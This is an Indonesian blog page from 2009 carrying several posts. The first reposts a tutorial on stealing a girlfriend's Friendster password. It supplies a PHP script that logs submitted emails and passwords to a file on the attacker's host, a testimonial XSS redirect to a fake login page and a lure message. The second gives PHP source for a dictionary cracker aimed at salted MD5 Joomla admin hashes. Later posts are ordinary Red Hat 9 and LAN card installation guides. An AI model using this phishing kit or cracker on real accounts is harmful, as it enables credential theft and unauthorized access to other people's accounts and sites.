Jumat, 27 Maret 2009

mendapatkan password friendster

Setelah mencari ide apa yang artikel apa yang harus dimasukan kedalam blog saya. akhirnya saya memutuskan untuk mencari artikel tentang cara menghacking password Friendster karena banyak teman - teman saya yang menyarankan untuk memasukan artikel tersebut agar mereka mudah untuk membacanya tanpa perlu memakai search engine segala. dan setelah goggling sejenak akhirnya saya dapat juga di jasakom.com. nah ini dia selamat membaca. GBU ;)
Penerapan Social Engineering untuk mendapatkan password di Friendster
Date: Wednesday, February 14, 2007 Hits: 14195 By: numpang_lewat
Artikel ini ditujukan bahwa ” Hacking tidak selamanya menggunakan TOOLS “. So bagi para 3133t sebaiknya tidak membaca ARTIKEL ini jika anda tidak ingin mual, perut kembung, bibir pecah2, kepala senut2.. :P dll.


Artikel ini diperuntunkan bagi anda tertarik, cinta, haus ilmu dari Social Engineering….

Sekali lagi Artikel ini hanya ditujukan bagi temen2 yg belum mengetahui teknik ini. Jika temen2(terutama for 3133t) Sudah tahu teknik ini SAYA MOHON STOP!! STOP!! STOP!! STOP!! STOP!! STOP!! tetapi bila anda tetap sja Ngotot ingin meneruskan saya tidak bisa memaksa anda…

Lanjutt ….

Akhir-akhir ini banyak yg membicarakannya, bahkan sedang menjadi berita hangat. Mngkin para 3133t sudah menemukannya hampir 2 tahun yg lalu. Sebagaimna telah dijelaskan pada artikel sebelumnya (WuPz, jagonya dll). Testimonial Redirect bisa jadi berabe bgt kalo disalah gunakan. Artinya?? cara tersebut bisa digunain buat ngedapetin password, cookies, or perhatian lebih dari doi ama kita ;) ) n laen-laen .. :P .

So langsung saja kita menuju acara puncak …

Pertama-tama yg mesti kita siapin :

1. Teh manis penghangat malam.
2. Jangan Lupa cemilan yg bikin Kriuk .. kriuk …
3. Web Hosting yg support PHP. Cari di paman Google banyak..
4. Upload file index.htm (ada di source).

5. Sertakan code php dan JavaScript di bawah ini dan ” SAVE As ” sesuai dg nama link yg dituju pada Form Login.

$email = $_POST[email];
$password = $_POST[password];
$fl = fopen(’password.txt’, ‘a’);
fwrite($fl, “$email . $password \n\n”);
fclose($fl);

?>



Dan upload file diatas ke www.webyangsupportphp.com

6. Buat file Text kosong dengan nama Sesuai perintah Open pada php code di atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.

7. kirim testi dg :

hai syang .. gimna kabarna, kagen nie ..

nah .. Setelah sang pacar penerima testi membuka “New Testimonials”, maka sesuai dg perintah yang berada di JavaScript => window.location <= yg disisipkan maka link akan menuju ke http://webyangsupportphp.com/index.htm . setelah terbuka, secara tanpa sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!! tanpa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan dg rela hati mengisi Form login tipuan.
Akhirnya dg pura-pura tidak tahu, muka bego, sedikit bodoh. Si pengirim testi menawarkan jasanya untuk sang pacar tercinta… :P =] :) )

Selain itu teknik diatas akan terlihat seperti aslinya jika menggunakan ” OVERLAY GENERATOR ” pada profil fs pada saat pengiriman testimonial yg berisi html code ( index.htm). Dg mengganti link Relatif menjadi absolut(baca S.I.H lebih lanjut) pada form login di index.htm maka pada saat pengiriman data akan menuju ke http://webyangsupportphp.com/login.php

Kesimpulan :

# Hacking tidak selamanya menggunakan ” TOOLS “
# Kelemahan XSS merupakan bahaya besar
# Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda sendiri !!!!

Thanks To :

Allah SWT
———
-V-i-e- My Queen

$Jasakom Community
$Aat Shadewa - thanks 4 your knowledge.
$Xcode Community
$h_iem_ura, daddy, otoy’s, rahmat-mh, n 2 friends that can’t be says one by one.
$komp butut gw!!



Lanjut membaca “mendapatkan password friendster”  »»

konsep sederhana joomla password cracker





Apa yang akan penulis jelaskan disini, begitu juga dengan apa yang telah penulis jelaskan pada tutorial sebelum-sebelumnya, mengenai hacking tentunya, di ibaratkan seperti pisau yang memiliki 2 sisi tajam, di satu sisi seorang admin web dapat menjaga ketat sitenya dengan aman, namun patut diketahui pula tidak ada sistem yang memiliki keamanan 100%, selalu saja ada bolong yang masih dapat di eksploitasi, tapi setidaknya dapat meminimalisir serangan yang ada, dan di sisi lain yang akan penulis terangkan nanti tentunya cenderung digunakan untuk kegiatan vandalisme/merusak oleh beberapa pihak. Ya, tidak heran jika teori tesis dan anti tesis kerapkali hadir dalam dunia perhackingan ini. Di satu sisi membangun tapi di sisi lain menghancurkan. Lantas yang harus di lakukan sekarang adalah, tetap waspada pada security risk yang ada, dan ketahuilah tamu tak diundang selalu menyempatkan waktunya untuk hadir memonitoring site anda, jika anda melakukan sedikit saja salah langkah akibatnya cukup fatal.

Waha... sepertinya intro tutorial harus dipisahkan sendiri dalam tutorial yang berbeda, jari penulis begitu asik menari-nari di atas tuts keyboard sampai-sampai lupa pada pokok pembahasan. :D.

Ya, berdasarkan artikel sebelumnya, betapa mudahnya seorang attacker mendapatkan username dan password sang administrator pada content management system seperti joomla, tapi masih terdapat satu masalah, dimana seorang attacker masih belum dapat melakukan eksploitasi lebih lanjut, dikarenakan password yang didapatkan itu masih dalam bentuk password yang terenkripsi, sehingga butuh perlakuan khusus lebih lanjut untuk mendapatkan password yang sesungguhnya. Di sinilah penulis akan mencoba menjelaskan sebuah konsep sederhana bagaimana mendapatkan suatu password asli yang terenkripsi, namun penulis hanya membatasi cracking password pada satu jenis hash saja, yaitu joomla hash password. Penjelasan yang akan penulis lakukan bukanlah mencoba membuat algoritma dekripsi password tetapi hanyalah penggunaan metode dictionary file, dimana untuk mendapatkan password asli cukup dilakukan pencocokan password dengan kamus data yang ada sehingga menghasilkan password yang sebenarnya. :D. Namun setiap aplikasi selalu saja memiliki kekurangan, penulis tidak menafikan hal itu. Karena kesempurnaan hanyalah milik sang Pencipta. ;) Kekurangannya adalah resource memori yang di butuhkan untuk metode seperti ini cenderung lebih besar dari ukuran biasanya.

Berikut adalah source code lengkap 'simple joomla password cracker' :

-----------------------// cut here




::: Joomla Password Cracker :::
















Simple
Joomla Password Cracker

Developed by : ilmuwebsite.com









Masukkan
password hashnya disini :











$hashes=array();
$i=0;
$parts=explode(":",$_POST['hash']);
$hashes[$i][0]=$parts[0];
$hashes[$i][1]=$parts[1];

if (ISSET($_POST['hash']))
{
$str = " ";
echo "Started: ";
echo date("F j, Y, g:i:s a");

$lines = file('kamus2.txt');

foreach ($lines as $line_num => $line)
{
check($line);
}

$lines = file('kamus1.txt');

foreach ($lines as $line_num => $line)
{
check($line);
}

echo "
Finished : ";
echo date("F j, Y, g:i:s a");

}

function check($a)
{
global $i;
$a=rtrim($a) ;

for($x=0;$x<=$i;$x++)
{
global $hashes;

if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo "

The password is :

$a

";
echo "Ended: ";
echo date("F j, Y, g:i:s a");
}

}

}
?>


Tolong di kembangkan ya ?! :D




-----------------------// cut here


Untuk menjalankan script ini di localhost anda perlu merubah konfigurasi php.ini, yaitu dengan mengganti baris ini :
memory_limit = 32M ;



menjadi > 32, penulis menggantinya menjadi :
memory_limit = 256M ;

Ya, sebelum berlanjut, penulis akan membahas struktur password joomla yang terenkripsi terlebih dahulu, enkripsi password joomla biasanya terdiri dari hash dan salt. Standar enkripsi joomla biasanya berbentuk seperti ini :

b51498faae03f7cf533e3ed97fc00116:9VrQpQzdNQHhtieK

Hashnya itu terdapat pada bagian yang pertama yaitu b51498faae03f7cf533e3ed97fc00116, dan saltnya itu ada di bagian akhir 9VrQpQzdNQHhtieK, keduanya terlihat di pisahkan dengan titik dua ":". Salt bagi seorang attacker berfungsi untuk membantu dalam pencarian password sesungguhnya.
Yang ditemukan disini adalah jika password berbentuk plain text di gabung dengan saltnya maka akan menghasilkan hash password joomla. Dengan kata lain jika : x + salt = hash joomla. Sehingga jika di implementasikan melalui enkripsi md5 :

md5(x + salt) = hash

maka :

md5(x + 9VrQpQzdNQHhtieK) = b51498faae03f7cf533e3ed97fc00116

berapakah x ? ( pak Mamat guru matematika di SMAN 4 Bogor kayanya tau. :D huehuehuehehe... )

Ya seperti pada baris kalimat ini :

...
if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo "

The password is :

$a

";
...

Dan hasilnya adalah ...


:D~~

Penulis yakin anda cukup familiar dengan source di atasnya. Dan algoritmanya pun cukup mudah. Script lengkap dan kamus passwordnya dapat di download di sini ...
Selamat mencoba. Selamat mengembangkan ! :D

Greetz for : b_scorpio, peterpanz, abuzahra, phii_, nazwa, jojo, ivan, fadli, safril, dr.emi, husniearif, [H], dan ilmuwebsite community.

Lanjut membaca “konsep sederhana joomla password cracker”  »»

Jumat, 20 Maret 2009

Installasi Linux Red Hat 9.0

Setelah memahami konsep sistem operasi jaringan dan anda telah menentukan sistem operasi mana yang akan digunakan sebagai sistem operasi jaringan, pada kegiatan belajar yang kedua ini peserta diklat berlatih untuk menginstalasi sistem operasi jaringan dengan Sistem Operasi Linux Redhat 9.




Hal-hal yang perlu diperhatikan dalam melakukan instalasi sistem operasi Redhat 9 berbasis GUI diantaranya adalah sebagai berikut :

a)Pemilihan Versi Redhat
Karena terdapat varian Redhat maka perlu dipilih varian mana yang akan digunakan. Pemilihan ini didasarkan pada kebutuhan sistem dan kemampuan hardware. Dengan memilih sistem operasi yang sesuai akan menghemat biaya dan meningkatkan efisiensi pekerjaan

b)Pemilihan mode instalasi
Mode instalasi berbasis grafik (GUI) mempunyai tampilan yang menarik dengan menu yang user friendly seperti pada menu-menu program berbasis Microsoft Windows tetapi mode ini memerlukan dukungan hardware yang bagus.
Jika hardware yang digunakan kurang mendukung dapat dipilih mode text untuk mempercepat proses instalasi

c)Pemilihan metode instalasi
Redhat Linux menyediakan beberapa cara instalasi yaitu dengan CD-ROM, melalui hard disk, Melalui NFS, FTP maupun HTTP. Proses instalasi melalui CD-ROM dan hard disk lebih baik karena lebih mudah dan cepat.

d)Penomoran TCP/IP
Setelah peserta diklat melakukan instalasi sistem operasi Linux Redhat 9 dengan benar, kemudian dapat mengeceknya apakah sistem operasi yang telah diinstal dapat bekerja sesuai dengan yang diiginkan.

2) Proses Instalasi
Proses instalasi yang akan dijelaskan disini menggunakan CD-ROM sebagai file master Redhat Linux 9 yang terdiri dari 3 CD. Proses ini dipilih karena lebih sering digunakan dan persiapan yang dilakukan cukup mengubah setting bios pada boot sequence dengan menempatkan CD-ROM pada urutan pertama. Untuk melakukan pengaturan BIOS tekan tombol Delete pada keyboard pada saat komputer pertama kali booting sehingga muncul tampilan sebagai berikut :

gbr8.png

Gambar 8. Menu Pengaturan BIOS Komputer
Pilihlah menu Advanced BIOS Features sehingga akan muncul tampilan setting BIOS sebagai berikut :

gbr9.png

Gambar 9. Tampilan Mengatur Boot dari CD

Setelah melakukan setting BIOS masukkan CD #1 Master Linux Redhat 9 lalu komputer di restart sehingga komputer akan booting dari CD-ROM. Setelah komputer booting dari CD, maka akan muncul menu tampilan pemilihan mode instalasi seperti gambar di bawah :

gbr10.png

Gambar 10. Menu Pilihan Mode Instalasi

Pilihlah mode install Red Hat Linux in Graphical mode dengan menekan tombol di keyboard. Komputer akan memunculkan menu pilihan untuk mendiagnosis CD master Linux Redhat 9 apakah kondisinya baik atau tidak. Jika anda tidak ingin melakukan diagnosis pilih [Skip] untuk melanjutkan proses instalasi.

Gambar 11. Menu Pilihan Chek CD

Gambar 12. Menu Proses Cek CD
Komputer akan mengecek hardware komputer dan mendeteksi secara otomatis periperal yang digunakan. Dan setelah selesai akan muncul menu Welcome screen sebagai berikut :

Gambar 13. Tampilan Selamat Datang pada Instalasi Redhat 9

Pilih tombol Next untuk melanjutkan proses instalasi sehingga akan muncul menu pilihan bahasa sebagai berikut :

Gambar 14. Pemilihan Bahasa
Pilih bahasa untuk proses instalasi yang familiar (English) lalu tekan tombol Next sehingga akan muncul tampilan sebagai berikut:

Gambar 15. Pemilihan Konfigurasi Keyboard
Pilih konfigurasi keyboard yang sesuai (U.S. English) lalu tekan tombol Next

Gambar 16. Pemilihan Konfigurasi Mouse
Pilih mouse sesuai dengan mouse anda lalu tekan tombol Next untuk melanjutkan instalasi. Setelah itu akan muncul tampilan untuk menu pilihan instalasi.

Gambar 17. Pemilihan Instalasi atau Upgrade
Jika komputer yang akan diinstal belum mempunyai sistem operasi Linux Redhat sebelumnya maka pilih Install, jika sudah terdapat sistem operasi Linux Redhat versi sebelumnya dapat dipilih Upgrade maupun Install lalu tekan tombol Next

Gambar 18. Pemilihan Kustomasi Instalasi
Pilih menu pilihan jenis instalasi yang ingin dilakukan dalam hal ini tentu saja Server atau Custom.

Gambar 19. Partisi Hard Disk
Pilih menu Automatically Partition untuk melakukan partisi secara otomatis atau Manually partition With Disk Druid jika diinginkan partisi secara manual.

Gambar 20. Partisi Hard Disk Secara Otomatik
Jika dipilih menu Automatically Partition maka akan muncul tampilan seperti di atas. Pilih menu Remove all Linux partition atau yang lain sesuai kebutuhan. Jika hard disk masih kosong dan belum dipartisi maka Redhat akan melakukan partisi.

Gambar 21. Partisi Hard Disk Secara Manual
Jika anda memilih partisi secara manual akan tampak seperti pada gambar di atas.

Gambar 22. Partisi Hard Disk Secara Otomatis
Untuk menambah partisi jika diinginkan dapat dilakukan dengan memilih menu add partition.

Gambar 23. Boot Loader
Boot loader merupakan software yang pertama kali dijalankan ketika komputer pertama kali dinyalakan. Software ini berfungsi pada saat loading dan transfer control untuk mengoperasikan sistem kernel software.
Pengaturan boot loader mempunyai peranan yang penting jika komputer yang akan diinstal mempunyai sistem operasi lain maka kita dapat memilih booting dengan sistem operasi yang mana.
Redhat 9 menyediakan dua software boot loader yaitu GRUB dan LILO.

Gambar 24. Konfigurasi Jaringan
Sistem operasi Redhat Linux memerlukan setting konfigurasi jaringan. Program instalasi secara otomatis akan mendeteksi jenis network device yang sesuai. Selanjutnya masukkan alamat IP dan netmask. Di sini terdapat pilihan secara otomatis melalui DHCP atau secara manual.

Gambar 25. Pengaturan IP Address Secara Manual
Pengaturan IP Address harus disesuaikan dengan desain jaringan yang akan dibuat sehingga pengaturannya dapat dilakukan kemudian pada saat pengaturan jaringan.

Gambar 26. Konfigurasi Firewall untuk Keamanan
Untuk meningkatkan keamanan komputer pada network, Redhat Linux menyediakan Firewall Protection. Kita dapat memilih tingkat keamanan yang diiginkan seperti pada gambar di atas.
Di sini disediakan 3 tingkat keamanan yaitu
High
Tingkat keamanan ini hanya membolehkan koneksi sesuai dengan default setting sehingga hanya dapat melakukan koneksi dengan DNS replies dan DHCP
Medium
Tingkat mediium memberikan batasan-batasan koneksi terhadap source tertentu dalam sistem.
No Firewall
Pemilihan tingkat keamanan No Firewall dapat dilakukan jika yakin bahwa sistem berada dalam jaringan yang dapat dipercaya.

Gambar 27. Pemilihan Bahasa
Pilihlah bahasa yang akan digunakan

Gambar 28. Pengaturan Waktu
Pengaturan waktu harus dilakukan agar waktu yang ditunjukkan pada komputer sesuai dengan tempat dimana komputer diletakkan. Setelah pengaturan waktu selesai dilakukan maka akan muncul tampilan sebagai berikut :

Gambar 29. Pengaturan Password Root
Setelah proses instalasi maka akan muncul setting pasword root (administrator jaringan). Pada proses ini diperlukan pengaturan pasword root (administrator). Proses ini sangat penting di dalam sistem operasi jaringan karena hanya pada level inilah hak akses total dapat dilakukan.
Disamping root, dapat juga ditambahkan user yang dapat menggunakan sistem ini dengan pasword sebagai user.

Gambar 30. Autentifikasi Pengguna







Lanjut membaca “Installasi Linux Red Hat 9.0”  »»

Rabu, 11 Maret 2009

ada beberapa cara untuk install lan card baru di linux

Cara Manual
Pertama buka casing komputer linux anda dan pasang lan card baru di slot yang masih kosong, tutup kembali casing lalu nyalakan komputer.
Login sebagai root dan buka direktori /lib/modules/kernel_version_number/net/
Misalkan ethernet card yang anda baru pasang adalah 3Com dimana module di linuxnya bernama 3c59x, maka tambahkan module tersebut di dalam file /etc/modules.conf atau /etc/modprobe.conf (salah satunya yang ada) agar linux nantinya akan mendeteksi setiap kali booting
dengan cara menambahkan satu baris berikut
alias eth0 3c59x



ganti eth0 dengan eth1 jika linux anda sebelumnya telah terpasang satu lan card
Sekarang anda harus meload module tsb ke dalam kernel dengan cara
root# /sbin/insmod -v 3c59x

Selanjutnya pasang IP untuk lancard yang baru tadi dengan cara
root# ifconfig eth0 192.168.1.5 netmask 255.255.255.0 broadcast 192.168.1.255

Cara Lebih Mudah
Distro Redhat/ Fedora telah dilengkapi dengan aplikasi kudzu yang bertugas mendeteksi program yang sedang berjalan dalam system linuxnya (/etc/rc.d/init.d/kudzu)
Kudzu ini bisa juga mendeteksi lan card yang baru terpasang dan otomatis (jika support) akan menginstall driver/module untuk 3Com tadi, lalu gunakan program /usr/sbin/netconfig untuk konfigurasi IP address lan card.
Konfigurasi akan disimpan dan berjalan otomatis saat mesin mulai dijalankan.
Banyak cara lainnya untuk instalasi lan card, akan penulis ulas dilain kesempatan.


Lanjut membaca “ada beberapa cara untuk install lan card baru di linux”  »»

Panduan Instalasi Linux Redhat 9 Berbasis Text

Deskripsi / Glosari :
Login adalah suatu proses untuk masuk kedalam system linux
Logout adalah suatu proses untuk keluar dari system linux berkaitan untuk mematikan computer atau melakukan login ulang dengan username yang berbeda.
Username adalah nama pengguna yang akan masuk kedalam system linux.
Password adalah kata kunci rahasia yang digunakan oleh suatu user yang akan masuk kedalam system. User bisa masuk jika ada kesesuaian antara nama user dan passwordnya. Jika tidak sesuai, maka user akan tertolak untuk masuk kedalam system.

Sifat Linux :



perintah atau command linux adalah case sensitiv, sehingga dalam penulisan perlu memperhatikan penggunaan huruf besar dan kecilnya.
Jenis pengguna dalam linux ada dua yakni super user atau administrator dengan nama root dan user biasa dengan nama bebas.
Super user dengan nama root, mempunyai kekuasaan penuh untuk melakukan administrasi seperti mengatur hak akses, instalasi dan konfigurasi program dan perangkat keras (hardware) sedangan user biasa hanya diperkenankan untuk masuk kedalam sistem sebagai pengguna biasa yang tidak dapat melakukan konfigurasi sistem computer.
Setiap user yang akan login, harus memasukan pasangan dengan benar antara nama user dan password-nya. Jika benar, maka kita bisa masuk kedalam system, dan jika salah maka kita akan tertolak masuk kedalam system.

LANGKAH – LANGKAH MENGINSTAL LINUX DENGAN MODE TEXT
1.Hidupkan PC dan atur urutan booting PC dari CD ROM melalui program BIOS, dengan menekan tombol del saat terjadi POST (Power On Self Test).
2.Saat booting akan muncul tampilan program LINUX REDHAT yang pertama, kemudian ketik TEXT lalu tekan ENTER.
3.Program LINUX akan muncul informasi adanya CD, dengan konfirmasi CD FOUND? Kita pilih SKIP karena kita anggap CD masih bagus.
4.Proses penginstalan akan dilanjutkan dengan tampilan WELCOME TO REDHAT LINUX, lalu kita pilih OK.
5.Muncul tampilan LANGUAGE SELECTION, kita pilih ENGLISH lalu tekan tombol TAB dan pilih OK.
6.Muncul tampilan KEYBOARD SELECTION, kita pilih ENGLISH lalu tekan tombol TAB dan pilih OK.
7.Muncul tampilan MOUSE SELECTION, kita pilih Wheel Mouse (PS/2) lalu tekan TAB dan pilih OK.
8.Muncul tampilan INSTALATION TYPE, kita pilih jenis apa bisa Personal Desktop, WorksStation, Server atau Custom lalu tekan TAB lalu OK.
9.Muncul program partisi DISK PARTITION SETUP dengan pilihan :
AUTO PARTITION >> REMOVE PARTITION >>OK jika tidak ada penting.
DISK DRUID dengan menu [NEW] [DEL] [EDIT] [WRITE] [OK] [ESC], dengan urutan partisi :
/dev/hdd1 100MB tipe /ext3 jenis boot
/dev/hdd2 6000MB tipe /ext jenis /
/dev/hdd3 250MB tipe jenis /swap
10.Muncul BOOT LOADER CONFIGURATION dengan pilihan program GRUP dan LILO.
Kita pilih GRUP lalu tekan TAB dilanjutkan dengan OK.
pilih LEAVE BLANK lalu OK.
biarkan kosong [ ] pada pilihan USE GRUB PASSWD lalu tekan OK.
DEFAULT pada /dev/hdd2 lalu OK.
INSTALL di /dev/hdd (MBR) lalu OK.

11.Muncul FIREWALL CONFIGURATION, sebagai security level kita pilih MEDIUM lalu tekan OK.
12.Muncul LANGUAGE SUPPORT kita cari bahasa INDONESIA tab OK.
13.Muncul DEFAULT LANGUAGE kita pilih ENGLISH (USA) lalu OK.
14.Muncul TIME ZONE SELECTION kita pilih ASIA/ JAKARTA lalu tekan OK.
15.Muncul ROOT PASSWORD
16.Muncul PACKAGE GROUP SELECTION, beri tanda [*] dengan tombol SPASI jika akan memilih paket program yang akan di install lalu pilih OK.
17.Muncul INSTALATION TO BEGIN kita pilih OK.
18.Muncul FORMATING HARDISK dengan tampilan yang cepat jika hardisknya masih normal dan akan lama jika hardisk ada masalah.
19.Muncul COPYING FILE dengan proses yang agak cepat.
20.Muncul PACKAGE INSTALATION (Info Progress)
NAME : nama program yang di install
SIZE : besarnya ukuran program
SUMMARI : hasilnya
bar status dalam % (0-100) bytes per time
TOTAL : jumlah program terinstal secara keseluruhan
COMPLETED : jumlah yang sudah terinstal
REMAINING : kekurangan program
bar status total % (0-100) bytes per time
catatan : - masukan CD 2 dan CD 3 secara bergantian lalu tekan OK.
21.Muncul BOOT DISKET pilih YES atau NO.
22.Muncul VIDEO CARD CONFIGURATION pilih OK atau CHANGE.
23.Muncul MONITOR CONFIGURATION pilih OK atau CHANGE.
24.Muncul X CUSTOMIZATION pilih OK atau CHANGE.
25.CD KELUAR DAN PC melakukan BOOTING ULANG
26.Muncul tampilan WELCOME TO REDHAT LINUX untuk melakukan konfigurasi akhir meliputi :
Pembuatan USER,
Pengaturan DATE SYSTEM,
Setting SOUND,
Program ADDITION dari CD LAIN



Lanjut membaca “Panduan Instalasi Linux Redhat 9 Berbasis Text”  »»